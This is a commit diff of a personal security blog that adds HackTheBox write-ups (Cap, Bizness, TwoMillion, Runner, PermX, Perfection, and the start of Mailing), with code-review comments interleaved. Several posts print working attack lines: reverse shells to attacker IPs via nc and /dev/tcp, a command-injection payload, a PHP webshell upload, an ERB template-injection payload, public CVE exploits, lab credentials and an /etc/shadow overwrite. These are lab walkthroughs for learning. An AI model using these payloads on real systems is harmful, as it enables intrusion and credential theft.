update-2025

This commit is contained in:
racc0x 2025-02-03 22:22:27 -06:00
parent 46e2bdfa6e
commit 6278b1b310
495 changed files with 5669 additions and 17 deletions

@ -9,37 +9,37 @@ theme: jekyll-theme-chirpy
lang: en
# Change to your timezone https://kevinnovak.github.io/Time-Zone-Picker
timezone:
timezone: America/Monterrey
# jekyll-seo-tag settings https://github.com/jekyll/jekyll-seo-tag/blob/master/docs/usage.md
# ↓ --------------------------
title: Chirpy # the main title
title: RaCc0x # the main title
tagline: A text-focused Jekyll theme # it will display as the subtitle
tagline: A blog about security, CTF writeups, Pro Labs, researches and more | Prepare for ECPPT, CPTS & OSCP certified
description: >- # used by seo meta and the atom feed
A minimal, responsive and feature-rich Jekyll theme for technical writing.
A blog about security, CTF writeups, Pro Labs, researches and more.
# Fill in the protocol & hostname for your site.
# E.g. 'https://username.github.io', note that it does not end with a '/'.
url: ""
url: "https://racc0x.github.io"
github:
username: github_username # change to your GitHub username
username: racc0x # change to your github username
twitter:
username: twitter_username # change to your Twitter username
username: dreii042 # change to your twitter username
social:
# Change to your full name.
# It will be displayed as the default author of the posts and the copyright owner in the Footer
name: your_full_name
email: example@domain.com # change to your email address
name: racc0x
email: racc0xyz@gmail.com # change to your email address
links:
# The first element serves as the copyright owner's link
- https://twitter.com/username # change to your Twitter homepage
- https://github.com/username # change to your GitHub homepage
- https://twitter.com/dreii042 # change to your twitter homepage
- https://github.com/racc0x # change to your github homepage
# Uncomment below to add more social links
# - https://www.facebook.com/username
# - https://www.linkedin.com/in/username
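Review bot: the new `tagline` and `description` strings need a grammar pass before they ship in the SEO meta tags and the Atom feed: 'Prepare for ECPPT, CPTS & OSCP certified' reads as 'Prepare for the eCPPT, CPTS and OSCP certifications', and 'researches' should be 'research' in both places. The rewritten comments ('change to your github username', 'change to your twitter homepage') drop the product capitalisation the theme's original comments used; either keep the theme wording or remove the placeholder comments now that real values are filled in.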
@ -98,7 +98,7 @@ theme_mode: # [light | dark]
cdn:
# the avatar on sidebar, support local or CORS resources
avatar:
avatar: "/assets/img/inspectorardilla.jpg"
# The URL of the site-wide social preview image used in SEO `og:image` meta tag.
# It can be overridden by a customized `page.image` in front matter.
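Review bot: `avatar` now points at `/assets/img/inspectorardilla.jpg` while `cdn:` is left empty, so the path resolves against `url` (`https://racc0x.github.io`); confirm that file is among the files added in this commit, otherwise the sidebar renders a broken image.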

_posts/2021-05-06-cap.md Normal file

@ -0,0 +1,135 @@
---
title: HTB - Cap
date: 2021-05-06 00:00:00 +8000
categories: [hackthebox ]
tags: [HackTheBox, Information Disclosure, CVE-2021-4034, tcpdump]
image:
path: /assets/img/post/cap/Cap.png
lqip: 
alt: Hack the Box - Cap.
---
## Box Info
| Name | Cap |
| :-------------------- | ---------------: |
| Release Date | 5 Jun, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## Ping
```bash
ping -c 3 10.10.10.245
PING 10.10.10.245 (10.10.10.245) 56(84) bytes of data.
64 bytes from 10.10.10.245: icmp_seq=1 ttl=63 time=55.6 ms
64 bytes from 10.10.10.245: icmp_seq=2 ttl=63 time=55.9 ms
64 bytes from 10.10.10.245: icmp_seq=3 ttl=63 time=54.8 ms
```
`ttl=63 -> Linux System`
## Nmap
```bash
nmap -p- --open --min-rate 5000 -n -sS -vvv -Pn 10.10.10.245
```
```bash
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Sat, 22 May 2021 10:51:48 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Sat, 22 May 2021 10:51:42 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
...[snip]...
SF:eck\x20your\x20spelling\x20and\x20try\x20again\.</p>\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```
![Image](../assets/img/post/cap/image.png)
data/1
![Image](../assets/img/post/cap/image-1.png)
I starter with a scan directoriy but dont foudn anything interesting
![Image](../assets/img/post/cap/image-2.png)
## Information Disclosure
```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u 'http://10.10.10.245/data/FUZZ' -fs 208
```
![Image](../assets/img/post/cap/image-3.png)
I download those and i test one by one to found sensitive data
![Image](../assets/img/post/cap/image-4.png)
```bash
tcpdump -qns 0 -X -r 0.pcap
```
**User:**
![Image](../assets/img/post/cap/image-5.png)
**Password:**
![Image](../assets/img/post/cap/image-6.png)
`nathan`
`Buck3tH4TF0RM3!`
**Login with ssh**
![Image](../assets/img/post/cap/image-7.png)
## Escalation Privilege | CVE-2021-4034
```BASH
find / -perm -4000 2>/dev/null
```
![Image](../assets/img/post/cap/image-8.png)
We found a bin interesting called pkexec. Looking if the pkexec has a vulnerability, i find a CVE-2021-4034
https://github.com/ly4k/PwnKit
We upload the file PwnKit and exploit as nathan and BOOM!
![Image](../assets/img/post/cap/image-9.png)
Pwned!!
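Review bot: the front-matter `date: 2021-05-06 00:00:00 +8000` carries a UTC offset that does not exist (offsets are ±HHMM and cannot exceed +1400), so Jekyll will either reject the date or silently shift it; use a valid offset such as the `-0400` the other posts use. The Box Info table says 'Release Date | 5 Jun, 2024' while the post is dated 2021 and the nmap banner shows 'Sat, 22 May 2021', so one of the two is wrong. Minor: `lqip:` is empty, the privilege-escalation fence is tagged `BASH` rather than `bash` like the rest of the post, and 'I starter with a scan directoriy but dont foudn anything interesting' wants 'I started with a directory scan but didn't find anything interesting'.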

@ -0,0 +1,94 @@
---
title: HTB - Bizness
date: 2024-08-13 12:17:34 -0400
categories: [hackthebox , Bizness]
tags: [hackthebox, Apache, OFBiz,dirsearch,nmap,cracking,enumeration,hashcat,htb-bizness,ctf,CVE-2023-49070,linux]
image:
path: /assets/img/post/bizness-card.png
lqip: 
alt: Hack the Box - Bizness.
---
## Box Info
| Name | Bizness |
| :-------------------- | ---------------: |
| Release Date | 06 Jan, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## Enumeration
```bash
nmap -p- --min-rate 5000 -n -sS -vvv -Pn 10.10.11.252 -oG allports
nmap -sCV -p 22,80,443,40117 10.10.11.252 -oN targeted
```
![Image](/assets/img/post/bizness1.png)
## Add the domain to /etc/hosts
```bash
echo "10.10.11.252 bizness.htb | sudo tee -a /etc/hosts/
```
![Image](/assets/img/post/bizness2.png)
## Brute Force Directory
```bash
dirsearch -u http://bizness.htb/
```
![Image](/assets/img/post/bizness3.png)
## OFBiz
The website is using a technology called `OFBiz` with version `18.12`, the current version is out date.
![Image](/assets/img/post/bizness4.png)
## Apache OFBiz 18.12 CVE-2023-49070
![Image](/assets/img/post/Bizness5.png)
[***Apache-OFBiz-Authentication-Bypass***](https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass)
We used the exploit to authenticate ourselves.
```bash
python3 exploit.py --url https://bizness.htb:443 --cmd 'nc -e /bin/bash 10.10.14.16 7777'
```
```bash
nc -lvnp 7777
```
![Image](/assets/img/post/bizness6.png)
## Enumeration linux
Before launching this search, I found a location where the OFBiz folder was located and performed searches that contain admin.
I searched recursively using grep, using options like -Rail, and to specify the word I used -e.
```shell
grep -Rail -e 'admin$' /top/ofbiz/runtime/data/derby/ofbiz/seg0
```
![Image](/assets/img/post/bizness7.png)
We came across a lot of data, so we have to go through each one by one.
We find a user and the hash
![Image](/assets/img/post/bizness8.png)
## Cracking Hash
We will use the Go hash matcher script to crack the password.
[**Go-Hash-Matcher**](https://github.com/IamLucif3r/Go-Hash-Matcher?source=post_page-----68713a41f98b--------------------------------)
![Image](/assets/img/post/bizness9.png)
Once we have the password, we log in at the `root`
![Image](/assets/img/post/bizness10.png)
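Review bot: the hosts-file line `echo "10.10.11.252 bizness.htb | sudo tee -a /etc/hosts/` is broken twice: the closing double quote is missing, so the shell keeps waiting for input, and `/etc/hosts/` with a trailing slash names a directory, so `tee` fails with 'Is a directory' even once the quote is fixed; the working form is the one the Perfection post uses (`echo "..." | sudo tee -a /etc/hosts`). The `grep` path `/top/ofbiz/runtime/data/derby/ofbiz/seg0` is never explained and `/top` is an unusual location; check it against the screenshot. Since the Derby segment files are binary, it is worth spelling out the `-Rail` flags once (recursive, treat binaries as text, case-insensitive, list matching files only), because `-a` is what makes the match possible at all. Wording: 'the current version is out date' should be 'this version is outdated'.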

@ -0,0 +1,214 @@
---
title: HTB - TwoMillion
date: 2023-06-07 12:17:34 -0400
categories: [hackthebox , TwoMillion]
tags: [HackTheBox, API endpoints, API, CVE-2023-0386, nmap, web, rot13, curl,OverlaysFS Fuse]
image:
path: /assets/img/post/twomillion/twomillion-card.png
lqip: 
alt: Hack the Box - TwoMillion.
---
## Box Info
| Name | Bizness |
| :-------------------- | ---------------: |
| Release Date | 07 Jun, 2023 |
| OS | Linux |
| Rated Difficulty | Easy |
## Enumeration
### Nmap
```bash
nmap -p- --min-rate 5000 -n -sS -vvv -Pn 10.10.11.221 -oG allPorts
nmap -sCV -p 22,80 10.10.11.221 -oN targeted
```
![Image](/assets/img/post/twomillion/0.png)
### Resolution DNS
```bash
echo "10.10.11.221 twomillion.htb | sudo tee -a /etc/hosts"
```
![Image](/assets/img/post/twomillion/1.png)
## Web
When hover the mouse over "`here`" show it us the link to goes.
![Image](/assets/img/post/twomillion/2.png)
Looking in dom i found this path from a API and the instruction of how script works
![Image](/assets/img/post/twomillion/3.png)
![Image](/assets/img/post/twomillion/4.png)
Url decode for read more comfort:
```js
function verifyInviteCode(code){
var formData = {"code":code};
$.ajax({
type: "POST",
url: '/api/v1/invite/verify',
dataType: 'json',
data: formData,
success: function(response){
console.log(response);
},
error: function(response){
console.log(response);
}
});
}
function makeInviteCode(){
$.ajax({
type: "POST",
url: '/api/v1/invite/how/to/generate',
dataType: 'json',
success: function(response){
console.log(response);
},
error: function(response){
console.log(response);
}
});
}
```
Theres a interesting function called makeInviteCode so we gonna execute this function on console from inspection web.
![Image](/assets/img/post/twomillion/5.png)
If i click in the object it show us something interesting encrypte in `ROT13`
![Image](/assets/img/post/twomillion/6.png)
We can decrypt rot13 with some web page for that
![Image](/assets/img/post/twomillion/7.png)
`"In order to generate the invite code, make a POST request to /api/invite/generate"`
```bash
curl -s -X POST "http://2million.htb/api/v1/invite/generate"
```
With `curl` can send a POST method for generate the invite code.
![Image](/assets/img/post/twomillion/8.png)
And the API it generate us an code in base64, it can decrypt with base64[^code] and use it for registration us web and login.
![Image](/assets/img/post/twomillion/9.png)
![Image](/assets/img/post/twomillion/10.png)
Looking in the web, I found a path in api/v1
![Image](/assets/img/post/twomillion/11.png)
## API
Abusing again the API we send a request in method GET with the Cookie
```bash
`curl -s -X GET "http://2million.htb/api/v1" -H "Cookie: PHPSESSID=avhllptt4vvs1rbocvart3ue9b"`
```
![Image](/assets/img/post/twomillion/12.png)
```bash
curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json" | jq
```
![Image](/assets/img/post/twomillion/13.png)
```bash
curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json" -d '{"email": "jack@jack.com"}' | jq
```
![Image](/assets/img/post/twomillion/14.png)
```bash
curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json" -d '{"email": "jack@jack.com", "is:admin": "True"}' | jq
```
![Image](/assets/img/post/twomillion/15.png)
```bash
curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json" -d '{"email": "jack@jack.com", "is:admin": "1"}' | jq
```
![Image](/assets/img/post/twomillion/16.png)
```bash
curl -s -X GET "http://2million.htb/api/v1/admin/auth" -H "Cookie: PHPSESSID="
```
![Image](/assets/img/post/twomillion/17.png)
```bash
curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json' -d '{"username": "jack"}' | jq
```
![Image](/assets/img/post/twomillion/18.png)
![Image](/assets/img/post/twomillion/19.png)
```bash
curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json' -d '{"username": ";whoami;"}'
```
![Image](/assets/img/post/twomillion/20.png)
```bash
curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json' -d '{"username": ";ls;"}'
```
![Image](/assets/img/post/twomillion/21.png)
```bash
curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json' -d '{"username": ";bash -c \"bash -i >& /dev/tcp/10.10.14.88/443 0>&1\" #"}'
```
![Image](/assets/img/post/twomillion/22.png)
```bash
rlwrap nc -lvnp 443
```
![Image](/assets/img/post/twomillion/23.png)
Enumerate linux we can see a folder with the name .env this contain a credentials in plane text. We are a www-data so we need
![Image](/assets/img/post/twomillion/24.png)
admin SuperDuperPass123
When we login the first appear is mail, this mail is lcoated in /var/mail
![Image](/assets/img/post/twomillion/25.png)
## CVE-2023-0386
Well, the mail says everything... Google it.
![Image](/assets/img/post/twomillion/26.png)
Search in google "OverlaysFS Fuse linux kernel and the fisrt poc i found is this `CVE-2023-0386`[^cve]
![Image](/assets/img/post/twomillion/27.png)
ROOT
### Source
[^code]: <https://www.base64decode.org/>
[^cve]: <https://github.com/sxlmnwb/CVE-2023-0386>
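Review bot: `echo "10.10.11.221 twomillion.htb | sudo tee -a /etc/hosts"` places the closing quote after `/etc/hosts`, so the whole line is a single string argument to `echo` and nothing is appended to the hosts file; the quote belongs after `twomillion.htb`. The hostname also changes between that line and every `curl` call, which use `2million.htb`; the post should use one name throughout. The Box Info table says 'Name | Bizness', copied from the previous post. The `curl` calls from `/admin/vpn/generate` onwards mix quote styles (`-H "Content-Type: application/json'`), which the shell will not parse, and the first API call is wrapped in backticks inside its fence. The sentence 'We are a www-data so we need' stops mid-thought. It would also help readers to name the finding rather than only the mechanics: an ordinary user can set their own `is:admin` field through `/admin/settings/update` and is then accepted by `/admin/auth`, which is a missing authorization check on that endpoint.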

_posts/2024-01-04-runner.md Normal file

@ -0,0 +1,157 @@
---
title: HTB - Runner
date: 2023-06-07 12:17:34 -0400
categories: [hackthebox , Runner]
tags: [HackTheBox, Port Forwarding, wfuzz, TeamCity, ssh, john, chisel, portainer, docker,fuzz]
image:
path: /assets/img/post/runner/runner-card.png
lqip: 
alt: Hack the Box - Runner.
---
## Box Info
| Name | Bizness |
| :-------------------- | ---------------: |
| Release Date | 08 Jun, 2024 |
| OS | Linux |
| Rated Difficulty | Medium |
## Enumeration
### Nmap
![Image](/assets/img/post/runner/0.png)
### Resolution DNS
```bash
echo "10.10.11.13 runner.htb | sudo tee -a /etc/hosts
```
### Scanning SubDomain
```bash
wfuzz -c -w /usr/share/wordlists/amass/shubs-subdomains.txt --hc 400,404,403,302 -H "Hosts: FUZZ.runner.htb" -u http://runner.htb -t 100
```
![Image](/assets/img/post/runner/1.png)
```bash
Whatweb http://runner.htb
```
## CVE-2023-42793 for Jet Brains
We can see the version of `TeamCity build management server`.
![Image](/assets/img/post/runner/2.png)
Googling `Teamcity 2023.05.3` exploit i found a `RCE` vulnerability for it.
![Image](/assets/img/post/runner/3.png)
PoC[^poc]: <https://github.com/Zyad-Elsayed/CVE-2023-42793>
```bash
python3 exploit.py -u http://teamcity.runner.htb -n test2 -p test122 -e test2@test.com
```
![Image](/assets/img/post/runner/4.png)
The script exploits to create an admin account on a TeamCity server. It sends a POST request to the target URL to create an admin user with specified or random credentials.
![Image](/assets/img/post/runner/5.png)
## SSH
Once inside, I enumerate these sections and found in Diagnostics make a backup and storage in a zip file and can we display the folders and found id_rsa.
![Image](/assets/img/post/runner/6.png)
We go to download and save for login with ssh.
![Image](/assets/img/post/runner/7.png)
Wait.. but dont have a user for login with ssh...
![Image](/assets/img/post/runner/8.png)
We also found users and there hashes in same folder.
![Image](/assets/img/post/runner/9.png)
## Crack Hash
We go to crack the password for it.
![Image](/assets/img/post/runner/10.png)
```bash
john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt hash.txt
```
Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3]) Remaining 1 password hash Cost 1 (iteration count) is 128 for all loaded hashes Will run 2 OpenMP threads
Password: `piper123`
Till now we have one id_rsa file, two users (Methew, jhon),password for Methew.
`ssh -i id_rsa john@10.10.11.13`
![Image](/assets/img/post/runner/12.png)
![Image](/assets/img/post/runner/11.png)
## Port Forwarding
```bash
netstat -nltp
ss -nltpu
```
127.0.0.1:9000 its potential, Ill be employing Chisel for port forwarding.
![Image](/assets/img/post/runner/13.png)
```bash
chisel server -p 6150 --reverse (Attack Machine)
./chisel client 10.10.14.68:6150 R:9000:127.0.0.1:9000 (Victim machine)
```
![Image](/assets/img/post/runner/14.png)
We go to our port 9000
![Image](/assets/img/post/runner/15.png)
## Docker
Login with credentials `matthew` - `piper123`
<https://nitroc.org/en/posts/cve-2024-21626-illustrated/#how-docker-engine-calls-runc>
![Image](/assets/img/post/runner/16.png)
## CVE-2024-21626 for Docker
![Image](/assets/img/post/runner/17.png)
the path `/proc/self/id/8` is from the [CVE-2024-21626](https://nitroc.org/en/posts/cve-2024-21626-illustrated/#how-docker-engine-calls-runc) - [PoC - GitHub](https://github.com/NitroCao/CVE-2024-21626?tab=readme-ov-file)
![Image](/assets/img/post/runner/18.png)
Now we go to console
![Image](/assets/img/post/runner/19.png)
Execute a `/bin/bash` as root
![Image](/assets/img/post/runner/20.png)
Just login as root and look the folder `root` for the flag
![Image](/assets/img/post/runner/21.png)
Root
#### Source
[^poc]: <https://github.com/Zyad-Elsayed/CVE-2023-42793>
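Review bot: the subdomain scan sends `-H "Hosts: FUZZ.runner.htb"`, but the HTTP request header is `Host`, so as written the virtual host never changes and wfuzz cannot find `teamcity.runner.htb`; the PermX post has the correct `Host:` form. The hosts-file command again lacks its closing quote. Box Info says 'Name | Bizness', and the front matter is dated 2023-06-07 while the table gives a 2024 release, so the `date` looks copied from the TwoMillion post. `Whatweb` is capitalised (the binary is `whatweb`), the `john` output is pasted as a single run-on line and would be clearer in a fence, and the user names drift between 'Methew', 'jhon', `john@10.10.11.13` and `matthew`. In the CVE-2024-21626 section the path `/proc/self/id/8` should be checked against the linked PoC: procfs has no `id` entry under `/proc/self`, and the vulnerability concerns an inherited file descriptor.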

_posts/2024-01-05-permx.md Normal file

@ -0,0 +1,167 @@
---
title: HTB - PermX
date: 2023-06-07 12:17:34 -0400
categories: [hackthebox , PermX]
tags: [HackTheBox,Chamilo LMS,CVE-2023-4220,mysql,symlink,curl ]
image:
path: /assets/img/post/permx/PermX.png
lqip: 
alt: Hack the Box - PermX.
---
## Box Info
| Name | Bizness |
| :-------------------- | ---------------: |
| Release Date | 20 Jun, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## Enumeration
### Nmap
![Image](/assets/img/post/permx/image.png)
#### whatweb:
![Image](/assets/img/post/permx/2.png)
#### Wappalyzer
![Image](/assets/img/post/permx/4.png)
### Web
![Image](/assets/img/post/permx/3.png)
#### Brute Forcing directory
I use
```bash
dirsearch -u http://permx.htb/
```
but i dont find anything interesting, So i use the Scan for Subdomain
#### SubDomain
```bash
wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --hc 400,403,404,302 -H "Host: FUZZ.permx.htb" -u http://permx.htb -t 100
```
![Image](/assets/img/post/permx/5.png)
Search for chamilo in google.
### Chamilo LMS - CVE-2023-4220
![Image](/assets/img/post/permx/6.png)
RCE:
```bash
echo '<?php system("bash -c 'bash -i >& /dev/tcp/10.10.10.13/9001 0>&'"); ?>' > rce.php
```
```bash
curl -F 'bigUploadFile=@rce.php' 'http://<chamilo>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
`The file has successfully been uploaded.`
```
```bash
curl 'http://<chamilo>/main/inc/lib/javascript/bigupload/files/rce.php'
`uid=33(www-data) gid=33(www-data) groups=33(www-data)`
```
![Image](/assets/img/post/permx/7.png)
We go to open the file through web.
![Image](/assets/img/post/permx/8.png)
Execute the file .php `http://lms.permx.htb//main/inc/lib/javascript/bigupload/files/rce.php` with `lvwrap nc -lvnp 7777` listening for get the reverse shell
![Image](/assets/img/post/permx/9.png)
taadaaa... Well, we login as `www-data` and we go to enumerate...
I found in config folder a file `configuration.php` and show it us a user and password.
Till now we have one user:`chamilo` and password:`03f6lY3uXAP2...`.
![Image](/assets/img/post/permx/10.png)
`netstat -nlp` or `netstat -ano` and we see one port strange and is port 3306 it is open for the database.
![Image](/assets/img/post/permx/11.png)
Use the mysql inside in the victim machine.
```bash
mysql -uchamilo -p and the password 03F6lY3uXAP2bkW8
```
![Image](/assets/img/post/permx/12.png)
```text
show databases;
use chamilo;
describe user;
select user_id,username,firstname,lastname,password,salt from user;
```
![Image](/assets/img/post/permx/13.png)
We login with ssh `mtz@permx.htb` and password `03F6lY3uXAP2bkW8`
![Image](/assets/img/post/permx/14.png)
`sudo -l`
![Image](/assets/img/post/permx/15.png)
## Symlink (Symbolic Link Attack)
The directory `/etc/init.d`{: .filepath} is home to **scripts** for System V init (SysVinit), the **classic Linux service management system**. It includes scripts to `start`, `stop`, `restart`, and sometimes `reload` services. These can be executed directly or through symbolic links found in `/etc/rc?.d/`{: .filepath}. An alternative path in Redhat systems is `/etc/rc.d/init.d`{: .filepath}.
Its main function is to change all file permissions, but it must be in the `/home/mtz` directory.
![Image](/assets/img/post/permx/16.png)
[Symlink Español](https://www.freecodecamp.org/espanol/news/tutorial-de-enlace-simbolico-en-linux-como-crear-y-remover-un-enlace-simbolico/)
[Symlink Hacktricks](https://book.hacktricks.xyz/pentesting-web/file-upload#symlink)
```bash
link soft / to cc
ln -s / cc
```
Create a folder that points to the root path with Symlink with the -s (soft) option to locate ourselves inside it and make changes to `/etc/shadow`{: .filepath} (root password) with a password that we create ourselves (cccc).
![Image](/assets/img/post/permx/17.png)
The `/etc/shadow`{: .filepath} storage the password of root
```bash
sudo /opt/acl.sh mtz rwx /home/mtz/etc/shadow (execute the script for change the permissions)
```
![Image](/assets/img/post/permx/18.png)
Generated a password for remplace the root password in `/etc/shadow`{: .filepath}
```bash
openssl passwd -6 cccc
```
![Image](/assets/img/post/permx/19.png)
and copy and paste en the file `"shadow"`
```bash
echo 'root: {password generate}:19871:0:99999:7:::' > /home/mtz/cc/etc/shadow
```
Login as root with password cccc
![Image](/assets/img/post/permx/20.png)
`Root`
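Review bot: the webshell one-liner `echo '<?php system("bash -c 'bash -i >& /dev/tcp/10.10.10.13/9001 0>&'"); ?>' > rce.php` will not produce the intended file: the inner single quotes terminate the outer single-quoted string, and the redirection is missing its descriptor (`0>&` should be `0>&1`, as in the Perfection post). Further down, `lvwrap nc -lvnp 7777` is a typo for `rlwrap`, and `http://lms.permx.htb//main/...` has a doubled slash. The `/etc/init.d` paragraph about SysVinit scripts does not connect to `/opt/acl.sh`, which is what `sudo -l` exposes; the sentence after it ('Its main function is to change all file permissions, but it must be in the `/home/mtz` directory') describes the actual constraint and should lead the section, together with the observation that a symlink under `/home/mtz` pointing at `/` is what defeats that path check. Finally, `echo 'root: {password generate}:19871:0:99999:7:::' > /home/mtz/cc/etc/shadow` truncates the entire shadow file, so every other account on the box loses its entry and can no longer log in, and the space after `root:` makes the field invalid; a lab report should at least state that collateral damage. Box Info again says 'Name | Bizness'.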

@ -0,0 +1,131 @@
---
title: HTB - Perfection
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , Perfection]
tags: [HackTheBox, SSTI, sudo, nmap, hashcat ]
image:
path: /assets/img/post/perfection/Perfection.png
lqip: 
alt: Hack the Box - Perfection.
---
## Box Info
| Name | Perfection |
| :-------------------- | ---------------: |
| Release Date | 02 Mar, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## Enumeration
```bash
nmap -p- --open --min-rate 5000 -n -sS -vvv -Pn 10.10.11.253 -oG allPorts
nmap -sCV -p 22,80 10.10.11.253 -oN targeted
```
![Image](/assets/img/post/perfection/0.png)
#### Resolution DNS
```bash
echo "10.10.11.253 perfection.htb" | sudo tee -a /etc/hosts
```
#### Technology
```text
whatweb http://perfection.htb
```
![Image](/assets/img/post/perfection/1.png)
## Web
![Image](/assets/img/post/perfection/2.png)
The web is powered by WEBrick version 1.7.0, `WEBrick is a Ruby library providing simple HTTP web servers`{: filepath}
![Image](/assets/img/post/perfection/3.png)
Well, if you intercept the request u can see something like this `category1=literature` but if u try to this `category1=$` get a redirect with a text "Malicious text blocked".
We can do with ffuf an scan for get a list of blocked characters.
```bash
ffuf -u http://10.10.11.253/weighted-grade-calc -d 'category1=FUZZ&grade1=90&weight1=30&category2=poop&grade2=100&weight2=50&category3=poop&grade3=100&weight3=20&category4=N%2FA&grade4=0&weight4=0&category5=N%2FA&grade5=0&weight5=0' -w /opt/SecLists/Fuzzing/alphanum-case-extra.txt -mr Malicious
```
But what happens if a url encode the input?
```text
category1= poop%0aFUZZ &grade1=90&weight1=30&category2=poop&grade2=100&weight2=50&category3=poop&grade3=100&weight3=20&category4=N%2FA&grade4=0&weight4=0&category5=N%2FA&grade5=0&weight5=0' -w /opt/SecLists/Fuzzing/alphanum-case-extra.txt -mr Malicious
```
`%0a`— represents a newline character, used to `bypass input validation`.
The first thing I think is that there may be an SSTI.
We go look to in payloadallthethings if there is something for ruby
[PaylaodsAllTheThings-Ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby---basic-injections)
![Image](/assets/img/post/perfection/pay.png)
`hURL` _to encode and decode payloads showcases the manipulation of data to exploit web application vulnerabilities. The payload crafted for the Weighted Grade Calculator application is designed to execute a reverse shell command, taking advantage of any potential server-side code execution vulnerabilities_
```shell
hURL -B "bash -i >& /dev/tcp/10.10.14.78/7777 0>&1" (base64)
```
```shell
hURL -U "{_stringbase64_}" (URLencoded)
```
![Image](/assets/img/post/perfection/5.png)
#### Payload
```text
category1=poop%0a<%25=system("echo+YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC40OC83Nzc3IDA%2BJjE%3D|+base64+-d+|+bash");%25>1
```
![Image](/assets/img/post/perfection/6.png)
Or use the payload `<%= IO.popen('id').readlines() %>` and urlencoded.
![Image](/assets/img/post/perfection/IO.png)
[Hacktricks-SSTI](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#erb-ruby)
```bash
<%= IO.popen('bash -i >& /dev/tcp/10.10.14.78/7777 0>&1').readlines() %>
```
![Image](/assets/img/post/perfection/7.png)
Enumerating found the file .db and got the credentials.
_A string is any sequence of 4 or more printable characters .db_
![Image](/assets/img/post/perfection/8.png)
## Privilege Escalation
![Image](/assets/img/post/perfection/9.png)
### Hashcat
```bash
hashcat -m 1400 hash.txt -a 3 "susan_nasus_?d?d?d?d?d?d?d?d"
```
![Image](/assets/img/post/perfection/10.png)
![Image](/assets/img/post/perfection/11.png)
```text
susan_nasus_413759210
```
![Image](/assets/img/post/perfection/12.png)
Root
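Review bot: the base64 in the final payload decodes to `bash -i >& /dev/tcp/10.10.14.48/7777 0>&1`, but the `hURL -B` line encodes `10.10.14.78`, so the two snippets come from different attempts and the pasted payload will not reach the listener the text describes; regenerate one from the other. The same payload ends in `%25>1`, a stray `1` after the closing ERB tag. The second `text` fence is the tail of the ffuf command (it still carries `' -w /opt/SecLists/... -mr Malicious`) rather than a request body; either show the complete ffuf line with `poop%0aFUZZ` in place or trim it to the POST body. The `%0a` explanation could say why a newline gets past the filter: the regex is not shown, but in Ruby `^` and `$` are line anchors, so an allow-list check written with them only validates the first line (`\A` and `\z` are the whole-string anchors), which is the fix a defender would want to see named. The `hURL` paragraph is a pasted description that never says what `hURL` is; one line noting it is a CLI encoder/decoder (`-B` base64, `-U` URL-encode) would do. 'A string is any sequence of 4 or more printable characters .db' is the `strings` man-page definition with the command left out; write the command that was run.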

@ -0,0 +1,245 @@
---
title: HTB - Mailing
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , Mailing]
tags: [HackTheBox, Impacket, wmiexec, NTLM, CVE-2024-21413, telnet, Evil-winrm, smb, more, nmap, hashcat, Dump Sam Hash, ]
image:
path: /assets/img/post/mailing/Mailing-card.png
lqip: 
alt: Hack the Box - Mailing.
---
## Box Info
| Name | Mailing |
| :-------------------- | ---------------: |
| Release Date | 02 Mar, 2024 |
| OS | Windows |
| Rated Difficulty | Easy |
## **Enumeration**
```bash
nmap -p- --open --min-rate 5000 -sS -n -vvv -Pn 10.10.11.14 -oG allPorts
```
![Image](/assets/img/post/mailing/1.png)
![Image](/assets/img/post/mailing/2.png)
ExtractPorts
```bash
